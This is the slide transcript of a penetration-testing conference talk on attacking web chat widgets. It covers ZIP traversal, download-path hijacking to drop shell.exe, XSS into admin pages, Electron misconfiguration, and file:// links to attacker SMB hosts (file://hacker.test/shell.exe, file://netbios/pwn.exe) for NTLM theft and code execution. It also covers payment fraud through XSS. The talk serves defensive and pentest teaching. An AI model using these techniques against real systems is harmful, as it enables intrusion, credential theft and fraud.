Chat with a hacker

Transcript

1. Chat with a hacker Increase attack surface for Pentest A

   talk by Egor Karbutov and Alexey Pertsev

2. • Egor Karbutov & Alexey Pertsev • Penetration testers @Digital

   Security • Speakers • Bug Hunters $ Whoarewe
 2

3. • Chats-Chats-Chats • How does it works? • ZIP old

   tricks • RCE via ZIP • So much XSS • Electron vulnerability • Scheme file:// for your chats • Payment through chats • Mobile Application Chats Agenda 3

4. • Chat images are taken for examples • All coincidences

   are accidental Disclaimer 4

5. Chats-Chats-Chats • What are you talking about? • Another chat?

   5

6. Chats-Chats-Chats • What are you talking about? • Another chat?

   6

7. С 7

8. Chat Types Social Networks CMS Desktop Application Mobile SDK Browsers

   8

9. • Increase attack surface • Social engineering attacks • Vulnerability

   of own implementations • Vendors vulnerability • User support is on the local network • Lack of segmentation (network) Does it help us? Pentest! 9

10. Chat for browsers. How does it works? JavaScript CMS =

    JS 10

11. • XML HTTP Request • Control of user data •

    Cookie • Tokens • Sensitive information • HTML replace • Remote update JavaScript «Privileges» 11

12. Services 12

13. Services 12

14. Services 12

15. • Social engineering attacks? • Will you send an EXE

    files? • We can use a couple of stupid tricks with ZIP Files 13

16. 42 Kb ZIP Bomb 24 Gb? 322 Gb? 132 Tb?

    4.5 Pb Hi @sergeybelove from 2014 :) 14

17. ZIP Format 15

18. ZIP Traversal 16

19. Let’s send a file storage.servise.test api.servise.test User interface Operator standalone

    program 17

20. Let’s send a file storage.servise.test api.servise.test Sending the file cat.png

    User interface Operator standalone program 17

21. Let’s send a file storage.servise.test api.servise.test Sending the file cat.png

    cat.png == id User interface Operator standalone program 17

22. Let’s send a file storage.servise.test api.servise.test Sending the file cat.png

    cat.png == id User interface Operator standalone program File Message
 file_path= “/file/id” 17

23. Let’s send a file storage.servise.test api.servise.test File Message
 file_path= “/file/id”

    Sending the file cat.png cat.png == id User interface Operator standalone program File Message
 file_path= “/file/id” 17

24. Let’s send a file storage.servise.test api.servise.test File Message
 file_path= “/file/id”

    Concat(‘https://storage.service.test', file_path); Sending the file cat.png cat.png == id User interface Operator standalone program File Message
 file_path= “/file/id” 17

25. Let’s send a file storage.servise.test api.servise.test File Message
 file_path= “/file/id”

    Concat(‘https://storage.service.test', file_path); Download file GET /file/id HTTP/1.1 Host: storage.service.test Sending the file cat.png cat.png == id User interface Operator standalone program File Message
 file_path= “/file/id” 17

26. Let’s send a file storage.servise.test api.servise.test File Message
 file_path= “/file/id”

    Concat(‘https://storage.service.test', file_path); Download file GET /file/id HTTP/1.1 Host: storage.service.test %Downloads%/cat.png Sending the file cat.png cat.png == id User interface Operator standalone program File Message
 file_path= “/file/id” 17

27. RCE via File api.servise.test User interface Operator standalone program 18

28. RCE via File api.servise.test Sending the file cat.png User interface

    Operator standalone program 18

29. RCE via File api.servise.test Sending the file cat.png File Message


    file_path = 
 “.hacker.site/file/id” User interface Operator standalone program 18

30. RCE via File api.servise.test File Message
 file_path =
 “.hacker.test/file/id” Sending

    the file cat.png File Message
 file_path = 
 “.hacker.site/file/id” User interface Operator standalone program 18

31. RCE via File api.servise.test File Message
 file_path =
 “.hacker.test/file/id” Concat(‘https://storage.service.test',

    file_path); Sending the file cat.png File Message
 file_path = 
 “.hacker.site/file/id” User interface Operator standalone program 18

32. RCE via File storage.servise.test.hacke.site api.servise.test File Message
 file_path =
 “.hacker.test/file/id”

    Concat(‘https://storage.service.test', file_path); Sending the file cat.png File Message
 file_path = 
 “.hacker.site/file/id” User interface Operator standalone program 18

33. RCE via File storage.servise.test.hacke.site api.servise.test File Message
 file_path =
 “.hacker.test/file/id”

    Concat(‘https://storage.service.test', file_path); Sending the file cat.png File Message
 file_path = 
 “.hacker.site/file/id” User interface Operator standalone program ../../../../../../../shell.exe == id 18

34. RCE via File storage.servise.test.hacke.site api.servise.test File Message
 file_path =
 “.hacker.test/file/id”

    Concat(‘https://storage.service.test', file_path); Download file GET /file/id HTTP/1.1 Host: storage.service.test.hacke.site Sending the file cat.png File Message
 file_path = 
 “.hacker.site/file/id” User interface Operator standalone program ../../../../../../../shell.exe == id 18

35. RCE via File storage.servise.test.hacke.site api.servise.test File Message
 file_path =
 “.hacker.test/file/id”

    Concat(‘https://storage.service.test', file_path); Download file GET /file/id HTTP/1.1 Host: storage.service.test.hacke.site %Downloads%/shell.exe Sending the file cat.png File Message
 file_path = 
 “.hacker.site/file/id” User interface Operator standalone program ../../../../../../../shell.exe == id 18

36. • XSS is the maximum impact • High level of

    message security • Not obvious places • Headers • GET/POST parameters for analytics • Our target is Admin page or statistic page XSS 19

37. • User-Agent • Referrer • Cookie • Origin • Custom

    Headers Headers for XSS 20

38. • Methods • GET • POST • WebSocket Parameters for

    XSS 21 Keep it simple. Use gray box analysis!

39. • Waiting for someone to visit this page • Abuse

    of complaints against administrators Admin & Statistic Page 22

40. The sad consequences • XSS into chat settings • Appearance

    customisation • Fonts • Labels • Color • Image • etc 23

41. Attack scheme №1 pentest_client.shop.test Evil Hacker 24

42. Attack scheme №1 XSS attack on chat pentest_client.shop.test Evil Hacker

    24

43. Attack scheme №1 XSS attack on chat pentest_client.shop.test Evil Hacker

    statistic_vendor.chat.test admin_vendor.chat.test 24

44. Attack scheme №1 XSS attack on chat pentest_client.shop.test Evil Hacker

    XSS attack on client admins statistic_vendor.chat.test admin_vendor.chat.test 24

45. Attack scheme №1 XSS attack on chat pentest_client.shop.test Evil Hacker

    XSS attack on client admins statistic_vendor.chat.test admin_vendor.chat.test 24

46. Attack scheme №1 XSS attack on chat pentest_client.shop.test Evil Hacker

    XSS attack on client admins JS code injection into chat settings statistic_vendor.chat.test admin_vendor.chat.test 24

47. Attack scheme №1 XSS attack on chat pentest_client.shop.test Evil Hacker

    XSS attack on client admins JS code injection into chat settings XSS from any user on the site statistic_vendor.chat.test admin_vendor.chat.test 24

48. Attack scheme №1 XSS attack on chat pentest_client.shop.test Evil Hacker

    XSS attack on client admins JS code injection into chat settings XSS from any user on the site pentest_client.shop.test statistic_vendor.chat.test admin_vendor.chat.test 24

49. Attack scheme №2 Evil Hacker statistic.chat.vendor admin.chat.vendor chat.vendor 25

50. Attack scheme №2 XSS attack on chat Evil Hacker statistic.chat.vendor

    admin.chat.vendor chat.vendor 25

51. Attack scheme №2 XSS attack on chat Evil Hacker XSS

    attack on vendor admins statistic.chat.vendor admin.chat.vendor chat.vendor 25

52. Attack scheme №2 XSS attack on chat Evil Hacker XSS

    attack on vendor admins statistic.chat.vendor admin.chat.vendor chat.vendor 25

53. Attack scheme №2 XSS attack on chat Evil Hacker XSS

    attack on vendor admins JS code injection into chat settings statistic.chat.vendor admin.chat.vendor chat.vendor 25

54. Attack scheme №2 XSS attack on chat Evil Hacker XSS

    attack on vendor admins JS code injection into chat settings XSS from any user on the site statistic.chat.vendor admin.chat.vendor chat.vendor 25

55. Attack scheme №2 XSS attack on chat Evil Hacker XSS

    attack on vendor admins JS code injection into chat settings XSS from any user on the site statistic.chat.vendor admin.chat.vendor chat.vendor chat.vendor 25

56. Attack scheme №2 XSS attack on chat Evil Hacker XSS

    attack on vendor admins JS code injection into chat settings XSS from any user on the site XSS from any user on chat clients statistic.chat.vendor admin.chat.vendor chat.vendor chat.vendor 25

57. Attack scheme №2 XSS attack on chat Evil Hacker XSS

    attack on vendor admins JS code injection into chat settings XSS from any user on the site XSS from any user on chat clients statistic.chat.vendor admin.chat.vendor statistic_vendor.chat.test admin_vendor.chat.test chat.test All chat clients services chat.vendor chat.vendor 25

58. Electron • OpenSource framework to build desktop apps using HTML,

    CSS and JavaScript • Electron accomplishes this by combining Chromium and Node.js into a single runtime • Chats vendor use Electron for admin desktop applications 26

59. • Electron Threat Model = Browser Threat Model • Untrusted

    content from the web • SOP Bypass • Control whether access to Node.js primitives is allowed from JavaScript • Potential access to Node.js primitives • Limited sandbox • XSS == RCE Electron Threat Model https://doyensec.com/resources/us-17-Carettoni-Electronegativity-A-Study-Of-Electron-Security.pdf https://blog.doyensec.com/2017/08/03/electron-framework-security.html 27

60. • nodeIntegration = true Electron sandbox bypass Electron 1.6.7 28

61. • nodeIntegration = true • Misconfiguration • SOP bypass via

    presence of privileged URLs • Switch false Electron sandbox bypass 29

62. • Typically used to retrieve files from networks and local

    disks • Vulnerability in the wild • Local File Inclusion • XXE • SSRF • Windows context • NTLM Hash Stealing • NTLM Relay • RCE File:// 30

63. • Admin desktop application for Windows • Available scheme file://

    • Scheme file:// like hyperlink Chats with File:// 31

64. Chats with File:// pentest_client.shop.test Admin desktop application Send NTLM hash

    Send file:// link file://hacker.test/ Hacker SMB Hash Cracking SMB Relay • Pentest in local network • RCE on client device and servers • Weakness & duplicate passwords (local services, servers, client devices) 32

65. • What can we do? • File:// with local files

    • file://C:/Windows/System32/calc.exe Tricks with File:// №1 • But we can’t use arguments file://C:/Windows/System32/cmd.exe /C calc • All symbols in file link is a path • It is only for social engineering attacks • You can combine this with dir traversal ZIP trick 33

66. • File:// with execute files from the Internet (Hacker SMB

    server) • file://internet_IP/pwn.exe Tricks with File:// №2 34

67. Chats with File:// pentest_client.shop.test Admin desktop application Download shell.exe Send

    file:// link
 on execute file file://hacker.test/shell.exe Hacker SMB • Pentest internet service and local network • RCE on client device • Social engineering attacks + file://local_files Clicking on the link Admin OS Executing shell.exe 35

68. • How to bypass Windows alert window? • “This file

    is in a location outside your local network” • Easy, I’ll use local addresses • 10.0.0.0—10.255.255.255 • 172.16.0.0—172.31.255.255 • 192.168.0.0—192.168.255.255 • No, it isn’t work Tricks with File:// №3 36

69. • “Local network” from OS Windows is servers with NetBios

    name • NetBios name - Domain names without dot • If I’ll use NetBios name “netbios” instead of “local IP”, I can bypass that alert • file://netbios/pwn.exe • How? • Smbd (samba) server + responder –d netbios –I eth0 • Working only in local networks Tricks with File:// №3 37

70. Chats with File:// • NetBios name trick in local network

    • Without alert window pentest_client.shop.test Admin desktop application Send file:// link
 on execute file file://netbios/pwn.exe Hacker SMB Clicking on the link Admin OS Download shell.exe Executing shell.exe 38

71. Add payment system Useful? Be careful to store a configs!

    39

72. Hacker can buy IPhone for free 40 Shop backend

73. Hacker can buy IPhone for free POST /pay?params=1 • shopId

    • customer • sum • item • … 40 Shop backend

74. Hacker can buy IPhone for free POST /pay?params=1 • shopId

    • customer • sum • item • … Redirect to payment page 40 Shop backend

75. Hacker can buy IPhone for free POST /pay?params=1 • shopId

    • customer • sum • item • … Redirect to payment page checkURL YES 40 Shop backend

76. Hacker can buy IPhone for free POST /pay?params=1 • shopId

    • customer • sum • item • … Redirect to payment page checkURL YES Evil Hacker 40 Shop backend

77. Hacker can buy IPhone for free POST /pay?params=1 • shopId

    • customer • sum • item • … Redirect to payment page checkURL YES Evil Hacker avisoURL IPhone X 40 Shop backend

78. Stealing money for hackers POST /pay?params=1 • shopId • customer

    • sum • item • … Steps to take profit: • Register own shop with similar name • Change shopId via XSS • Call checkURL and avisoURL as needed • All payments for hackers ! Protection: • Check Yandex Ips • Add anti-CSRF token for config form • DO NOT SHOW ANY PASSWORDS EVER 41

79. • Custom code for native applications • All code have

    only one privileges in Mobile OS • 3rd party applications have full access in your app • Change the user interface • Access to local files in folder app • Access to dynamic user data • Change logic app (like tapjacking) • Vulnerability • Custom implementation • WebView JS manipulation (Android) Mobile Application SDK https://labs.mwrinfosecurity.com/blog/webview-addjavascriptinterface-remote-code-execution/ 42

80. • ExpensiveWall is spread to different apps as an SDK

    called “gtk,” • ExpensiveWall sends data about the infected device to its C&C server, including its location and unique identifiers, such as MAC and IP addresses, IMSI, and IMEI. • Total Downloads infected applications = 5,904,511 ExpensiveWall https://blog.checkpoint.com/2017/09/14/expensivewall-dangerous-packed-malware-google-play-will-hit-wallet/ 43

81. • Farms that overestimate the rating of applications • Dynamic

    code execution and code update • JSPatch iOS • Android Runtime • Valid Ad that were vulnerable • Application with fake (Ad) SDK • Code review custom SDK code Don’t forget about 44

82. • For pentest and red team • Increase your attack

    surface via 3rd party services and program library • For you and your project • Think how much you trust other people’s implementations, applications in your devices, plugins in your program • Don’t forget about code review! • All vulnerability are reported and fixed Conclusion 45

83. Questions? Or @ShikariSenpai @_p4lex Egor Karbutov Alexey Pertsev Special THX

    to @cherboff and @barracud4_